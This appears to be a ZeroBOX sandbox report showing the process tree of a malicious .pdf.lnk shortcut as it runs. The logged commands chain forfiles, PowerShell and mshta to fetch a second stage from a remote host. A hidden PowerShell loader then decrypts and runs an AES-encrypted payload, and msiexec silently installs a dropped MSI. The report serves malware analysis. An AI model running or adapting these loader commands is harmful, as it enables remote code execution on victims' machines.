| ZeroBOX

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "wjIKIzri" C:\Users\test22\AppData\Local\Temp\SA162.pdf.lnk
2144
- forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://0had.com/stage2"
  1368
  - powershell.exe . mshta http://0had.com/stage2
    2376
    - mshta.exe "C:\Windows\system32\mshta.exe" http://0had.com/stage2
      1192
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function dIcfq($EIHqQ){return -split ($EIHqQ -replace '..', '0x$& ')};$rQOkxJ = dIcfq('2E06F507D03C819EA24495C6B0C0F17251DE594DAE971052747249D184E6E5DF1DD3631C5728B8C332B3844379C90DD55A300B00590CED5C3E93CF314BD7CC2EE020C9CDF7E044B5C41487792AD76BF7C6FD16298D8BE725412174B9FC660BF878FEE68B736D6C6F2D92556C96BDC73F51E1603E96C5D231C0046F8BEC47500CB01EEF682F60DE3C346CF426DB8B0167685BFCEDE092CDB0E22473267706E82BB1A778C2D427F48CD5533F066E076D71647B3861B9C36277BF02A97521ACE70B0B187C5FD2CD4F1472F0C3F439AF098F08858C37AE9A0CB4DA4E9B397D0BD2D42AA40639B50AF43D962FB63FE91E5EF95C6A68D07B631480E072CA7BEAAD1EB40B6E74FECB61EE70DC5A8FA00F64B482D94CA0767D18225246D36A85E0AC788AB4C51486F451384539D7C1175EE26797A04FA67D04C978C0C555A81782032931F69B8F92B039281B4E22256D1DCFA0AF90FD767270C27BB92FA14445A7224EBC73B0D5F7D50107B183B58C9A876D88F76938152308F3A5A12331C2FAE0B5731C1110DD719A8DC62C247C2981DFC6F7FDECFF8D6CC66CB6A6141A5258DB50EC50A6A82537006403DCD7B84EC1F5131B505AA82344AF28838DE92B11873F1D6C82D8584F2431D5768024E4B7A77B4D35005A573DF556236B1C1B3FCF4115A5081ECB727F41A06838004D589C894119D157B4FBC6A026BBA1A0417C975D505CE5AFADC1B35006869B6910D97EB0AD66A6ECA680DFB922B8EA02284BAE324A3FA74984A300BB9E5E4F2E279E6F5528A6B1670812E5A7D6E30BFC1254BABC43ABDB2E2810DB1B6E5C3731ED0B68E1BBEF5EAF00C8F8D9F0FFB6E2D9C86441BF83596B12D8C1D1615418641DB81857A4E17BF0EE90472CC23F29AED3DDC539980682D2BAE287883757D8313BB489F3C364D0F0C716E59FB15D600E392B696B8B776C18EE347AA2CB26EF3FD809BAC3E4A12ABA247773506FABECC78F6CCAC0C4E1F0674900FC693CA82137026FF68CF0934DA5845710FEE54625EE1E1D34895E24AD7FC4DD8212428DC378372FAD6930C24637E24C8AD0E53828AC18410DDE7CE03F4B1AC1F9EECD70804E9A53FE17F1F1CB485944770F55E81789654E264BEF8FF403D24CC654BE2852475205928E6043EDF69AD60F31E5F5039C022DEFFAE35D1B5F87ED0A9195F9938B32F712333D3E166A20C1948CE34123285B3F4E823774885B597EB7A8AC160E81F020CA3D1A3DF05C59CD04F8A023380FE2E57305C3C60B393596B74D44B8011A9F6EBEA97950832E925B913AB79768B8882D8CA7FCE5C630331E222C0103CD79EC8BCB5E19E8970F1241182C85468019F5576E6E34C3835A00C8548670ED7FBDF98BF6F271BF707680D1EBFD7D6A38187A73FEC730CE976865D5407D76120ED2A450AFD837E959D1F27EFE7E35EF3A2115B02B75B35AC2D2FBFAF4290A7A29A0A750ACBF9393341FB90457F056187770A860FABAC5C0045FF70261675F56B68518C24FE186A5ACFD80D3726997E487390D694F069FADA849');$QsFeX = [System.Security.Cryptography.Aes]::Create();$QsFeX.Key = dIcfq('49585252535A526E7648576269484A4E');$QsFeX.IV = New-Object byte[] 16;$rXQrgilN = $QsFeX.CreateDecryptor();$FmtjJIyba = $rXQrgilN.TransformFinalBlock($rQOkxJ, 0, $rQOkxJ.Length);$sQblIgVuf = [System.Text.Encoding]::Utf8.GetString($FmtjJIyba);$rXQrgilN.Dispose();& $sQblIgVuf.Substring(0,3) $sQblIgVuf.Substring(3)
        1324
        
        msiexec.exe "C:\Windows\system32\msiexec.exe" /qn /i C:\Users\test22\AppData\Roaming\putty.msi
        2556

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents